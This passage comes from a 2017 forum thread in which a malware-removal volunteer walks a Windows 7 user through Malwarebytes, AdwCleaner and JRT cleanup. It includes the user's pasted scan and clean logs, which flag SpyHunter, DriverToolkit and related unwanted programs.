  • Once Malwarebytes is installed, launch it and let it update his database. You might have to click on the little arrow by Scan Status in the middle right pane for it to do so;
  • Once the database update is complete, click on the Scan tab, then select the Threat Scan button and click on Start Scan;
  • Let the scan run, the time required to complete the scan depends of your system and computer specs;
  • Once the scan is complete, make sure that the first checkbox at the top is checked (which will automatically check every detected item), then click on the Quarantine Selected button;
    • If it asks you to restart your computer to complete the removal, do so;
  • Click on Export Summary after the deletion (in the bottom-left corner) and select Copy to Clipboard. Paste the content in your next reply;

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#13 sachyani

sachyani
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:09:35 AM

Posted 26 June 2017 - 12:49 PM

Here are the scan results from Malwarebytes:

 

Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 6/26/17
Scan Time: 7:38 AM
Log File: 
Administrator: Yes
 
-Software Information-
Version: 3.1.2.1733
Components Version: 1.0.139
Update Package Version: 1.0.2232
License: Trial
 
-System Information-
OS: Windows 7 Service Pack 1
CPU: x86
File System: NTFS
User: Landbase\Sachyani
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 248146
Threats Detected: 19
Threats Quarantined: 0
(No malicious items detected)
Time Elapsed: 6 min, 45 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
-Scan Details-
Process: 1
PUP.Optional.SpyHunter, C:\PROGRAM FILES\ENIGMA SOFTWARE GROUP\SPYHUNTER\SPYHUNTER4.EXE, No Action By User, [944], [396112],1.0.2232
 
Module: 1
PUP.Optional.SpyHunter, C:\PROGRAM FILES\ENIGMA SOFTWARE GROUP\SPYHUNTER\SPYHUNTER4.EXE, No Action By User, [944], [396112],1.0.2232
 
Registry Key: 6
PUP.Optional.SpyHunter, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SpyHunter, No Action By User, [944], [345850],1.0.2232
PUP.Optional.SpyHunter, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\SpyHunter4Startup, No Action By User, [944], [331711],1.0.2232
PUP.Optional.SpyHunter, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\ESGSCANNER, No Action By User, [944], [331708],1.0.2232
PUP.Optional.SpyHunter, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\SpyHunter 4 Service, No Action By User, [944], [331704],1.0.2232
PUP.Optional.SpyHunter, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{0AFA7312-957F-4031-8755-832DF5C30C64}, No Action By User, [944], [332366],1.0.2232
PUP.Optional.SpyHunter, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\ESGIGUARD, No Action By User, [944], [331706],1.0.2232
 
Registry Value: 3
PUP.Optional.SpyHunter, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\ESGSCANNER|IMAGEPATH, No Action By User, [944], [331708],1.0.2232
PUP.Optional.SpyHunter, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{0AFA7312-957F-4031-8755-832DF5C30C64}|PATH, No Action By User, [944], [332366],1.0.2232
PUP.Optional.SpyHunter, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\ESGIGUARD|IMAGEPATH, No Action By User, [944], [331706],1.0.2232
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 0
(No malicious items detected)
 
File: 8
PUP.Optional.SpyHunter, C:\USERS\SACHYANI\APPDATA\ROAMING\ENIGMA SOFTWARE GROUP\SH_INSTALLER.EXE, No Action By User, [944], [345850],1.0.2232
PUP.Optional.Solvusoft, C:\USERS\SACHYANI\DOWNLOADS\SETUP_DRIVERDOC_2016.EXE, No Action By User, [362], [331663],1.0.2232
PUP.Optional.SpyHunter, C:\USERS\SACHYANI\DOWNLOADS\SPYHUNTER-INSTALLER.EXE, No Action By User, [944], [345850],1.0.2232
PUP.Optional.SpyHunter, C:\WINDOWS\SYSTEM32\TASKS\SPYHUNTER4STARTUP, No Action By User, [944], [331709],1.0.2232
PUP.Optional.SpyHunter, C:\WINDOWS\SYSTEM32\DRIVERS\ESGSCANNER.SYS, No Action By User, [944], [331708],1.0.2232
PUP.Optional.SpyHunter, C:\PROGRAM FILES\ENIGMA SOFTWARE GROUP\SPYHUNTER\SH4SERVICE.EXE, No Action By User, [944], [331704],1.0.2232
PUP.Optional.SpyHunter, C:\PROGRAM FILES\ENIGMA SOFTWARE GROUP\SPYHUNTER\SPYHUNTER4.EXE, No Action By User, [944], [396112],1.0.2232
PUP.Optional.SpyHunter, C:\PROGRAM FILES\ENIGMA SOFTWARE GROUP\SPYHUNTER\ESGIGUARD.SYS, No Action By User, [944], [331706],1.0.2232
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)


#14 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,485 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:35 AM

Posted 26 June 2017 - 12:53 PM

If you want to keep SpyHunter, you can uncheck its entries (PUP.Optional.SpyHunter) and delete the rest. If you want to get rid of SpyHunter, uninstall it first, then delete the threats Malwarebytes detected.

Once done, let's run AdwCleaner and JRT. For AdwCleaner, it might detect SpyHunter as well (if you kept it), so be sure to uncheck its entries before clicking on the Clean button.

zcMPezJ.pngAdwCleaner - Fix Mode
  • Download AdwCleaner and move it to your Desktop;
  • Right-click on AdwCleaner.exe and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the EULA (I accept), let the database update, then click on Scan;
  • Let the scan complete. Once it's done, make sure that every item listed in the different tabs is checked and click on the Cleaning button. This will kill all the active processes;
    MV5ejgW.png
  • Once the cleaning process is complete, AdwCleaner will ask to restart your computer, do it;
  • After the restart, a log will open when logging in. Please copy/paste the content of that log in your next reply;
iT103hr.pngJunkware Removal Tool (JRT)
  • Download Junkware Removal Tool (JRT) and move it to your Desktop;
  • Right-click on JRT.exe and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Press on any key to launch the scan and let it complete;
    tLsXbWy.png
    Credits : BleepingComputer.com
  • Once the scan is complete, a log will open. Please copy/paste the content of the output log in your next reply;
Your next reply(ies) should therefore contain:
  • Copy/pasted AdwCleaner clean log;
  • Copy/pasted JRT log;

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#15 sachyani

sachyani
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:09:35 AM

Posted 26 June 2017 - 01:47 PM

Here is the log from the adwcleaner scan:

 

# AdwCleaner v6.047 - Logfile created 26/06/2017 at 21:39:52
# Updated on 19/05/2017 by Malwarebytes
# Database : 2017-06-26.1 [Server]
# Operating System : Windows 7 Home Premium Service Pack 1 (X86)
# Username : Sachyani - LANDBASE
# Running from : C:\Users\Sachyani\Desktop\AdwCleaner.exe
# Mode: Clean
 
 
 
***** [ Services ] *****
 
[-] Service deleted: EsgScanner
 
 
***** [ Folders ] *****
 
[-] Folder deleted: C:\Users\Sachyani\AppData\Local\DriverToolkit
[-] Folder deleted: C:\Program Files\DriverToolkit
[-] Folder deleted: C:\Users\Sachyani\AppData\Roaming\Mozilla\Firefox\Profiles\l6e3v380.default\extensions\safesearchplus2@avira.com
[-] Folder deleted: C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\ipmkfpcnmccejididiaagpgchgjfajgp
 
 
***** [ Files ] *****
 
 
 
***** [ DLL ] *****
 
 
 
***** [ WMI ] *****
 
 
 
***** [ Shortcuts ] *****
 
 
 
***** [ Scheduled Tasks ] *****
 
 
 
***** [ Registry ] *****
 
[-] Key deleted: HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\Software\DriverToolkit
[-] Key deleted: HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\Software\ParetoLogic
[-] Key deleted: HKU\S-1-5-21-1874987202-1180172134-3449041409-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06262017212159971\Software\DriverToolkit
[-] Key deleted: HKU\S-1-5-21-1874987202-1180172134-3449041409-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06262017212159971\Software\ParetoLogic
[-] Key deleted: HKU\S-1-5-21-1874987202-1180172134-3449041409-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06262017212547023\Software\DriverToolkit
[-] Key deleted: HKU\S-1-5-21-1874987202-1180172134-3449041409-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06262017212547023\Software\ParetoLogic
[#] Key deleted on reboot: HKCU\Software\DriverToolkit
[#] Key deleted on reboot: HKCU\Software\ParetoLogic
[-] Key deleted: HKLM\SOFTWARE\ParetoLogic
[-] Key deleted: HKLM\SOFTWARE\Google\Chrome\Extensions\ipmkfpcnmccejididiaagpgchgjfajgp
 
 
***** [ Web browsers ] *****
 
[-] [C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default] [extension] Deleted: ipmkfpcnmccejididiaagpgchgjfajgp
 
 
*************************
 
:: "Tracing" keys deleted
:: Winsock settings cleared
 
*************************
 
C:\AdwCleaner\AdwCleaner[C0].txt - [2329 Bytes] - [26/06/2017 21:39:52]
C:\AdwCleaner\AdwCleaner[S0].txt - [2725 Bytes] - [26/06/2017 21:34:26]
 
########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [2475 Bytes] ##########





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users